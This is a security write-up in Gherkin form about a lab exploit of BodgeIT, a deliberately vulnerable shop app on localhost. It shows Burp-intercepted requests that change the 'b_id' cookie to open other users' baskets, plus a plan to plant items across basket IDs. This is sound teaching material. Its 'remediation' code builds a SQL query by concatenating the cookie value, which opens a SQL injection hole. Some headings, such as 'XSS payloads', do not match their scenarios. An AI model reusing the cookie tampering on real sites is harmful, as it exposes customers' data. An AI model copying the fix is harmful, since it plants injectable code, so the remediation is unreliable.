## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Insecure Resource Access
  Location:
    bodgeit/password.jsp - HTTP Method
  CWE:
    CWE-0565: Reliance on Cookies without Validation and Integrity
    Checking -base-
      https://cwe.mitre.org/data/definitions/565.html
    CWE-0642: External Control of Critical State Data -class-
      https://cwe.mitre.org/data/definitions/642.html
    CWE-1020: Verify Message Integrity
      https://cwe.mitre.org/data/definitions/1020.html
  CAPEC:
    CAPEC-031: Accessing/Intercepting/Modifying HTTP Cookies -detailed-
      http://capec.mitre.org/data/definitions/31.html
    CAPEC-157: Sniffing Attacks -standard-
      http://capec.mitre.org/data/definitions/157.html
    CAPEC-117: Interception -meta-
      http://capec.mitre.org/data/definitions/117.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    See someone else's basket contents
  Recommendation:
    Don't rely on user-controllable data for authorization

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/password.jsp
    Then I can change my password

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/password.jsp"
    """
    ...
    38  Cookie[] cookies = request.getCookies();
    39  String basketId = null;
    40  if (cookies != null) {
    41    for (Cookie cookie : cookies) {
    42      if (cookie.getName().equals("b_id") && cookie.getValue().length() >
    0) {
    43        basketId = cookie.getValue();
    44        break;
    45      }
    46    }
    47  }
    ...
    """
    Then I see it uses a cookie value to decide what basket to show

  Scenario: Dynamic detection
  Cookie modification
    Given I am logged in to the site
    And intercept a basket request with Burp
    """
    POST /bodgeit/basket.jsp HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
    ;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/bodgeit/basket.jsp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: b_id=""; JSESSIONID=425674594D1E78949DF2836384878A32
    Upgrade-Insecure-Requests: 1

    quantity_30=1&update=Update+Basket
    """
    Then I notice there's an empty cookie "b_id"
    Then I modify it's value and forward the request
    """
    POST /bodgeit/basket.jsp HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
    ;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/bodgeit/basket.jsp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: b_id="1"; JSESSIONID=425674594D1E78949DF2836384878A32
    Upgrade-Insecure-Requests: 1

    quantity_30=1&update=Update+Basket
    """
    Then I get returned a basket with different contents than mine

  Scenario: Exploitation
  Harvesting user data
    Given I know I can see and modify other user's baskets
    Then I can iterate through ids adding my product to their basket
    Then when they check out, I recieve thousands of orders

  Scenario: Remediation
  Only allowing the intended method
    Given I patch the code as follows
    """
    ...
    38  String userid = (String) session.getAttribute("userid");
    39  String basketId = null;
    40  if (cookies != null) {
    41    for (Cookie cookie : cookies) {
    42      if (cookie.getName().equals("b_id") && cookie.getValue().length() >
    0) {
    43  ResultSet rs = stmt.executeQuery("SELECT * FROM Baskets WHERE basketid =
    " + cookie.getValue());
    44  rs.next();
    45  String bUserId = "" + rs.getInt("userid");
    46  if ((userid == null && ! bUserId.equals("0")) || (userid != null && user
    id.equals(bUserId))) {
    47    basketId = cookie.getValue();
    48    break;
    49  }
    50
    51      }
    52    }
    53  }
    ...
    """
    Then the basket is only returned if the user is it's owner

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-02-15
